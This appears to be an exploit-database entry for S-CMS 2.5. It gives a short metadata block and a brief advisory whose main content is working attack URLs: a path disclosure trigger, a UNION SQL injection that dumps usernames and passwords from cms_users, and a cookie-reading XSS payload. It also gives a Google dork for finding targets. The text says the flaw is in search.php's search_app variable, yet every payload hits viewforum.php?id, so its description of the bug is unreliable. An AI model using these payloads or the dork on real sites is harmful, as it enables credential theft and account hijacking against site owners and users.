vendor:
S-CMS
by:
LordTittiS
8,8
CVSS
HIGH
Full Path Disclosure / SQL Injection / Cross Site Scripting
89, 89, 79
CWE
Product Name: S-CMS
Affected Version From: 2.5
Affected Version To: 2.5
Patch Exists: NO
Related CWE: N/A
CPE: a:matteoiammarrone:s-cms
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
S-CMS Multiple Vuln
The vulnerability is in the file search.php, the variable search_app is vulnerable. An attacker can exploit this to find out the rootpath of website or for SQLi attack. Google Dork: inurl:viewforum.php?id= S-Cms. Exploit: http://server/s-cms/viewforum.php?id='1 (FPD), http://server/s-cms/viewforum.php?id=1+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7+from+cms_users-- (SQLi), http://server/s-cms/viewforum.php?id='1%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E (XSS)
Mitigation:
Input validation, parameterized queries, and proper output encoding should be used to prevent exploitation of this vulnerability.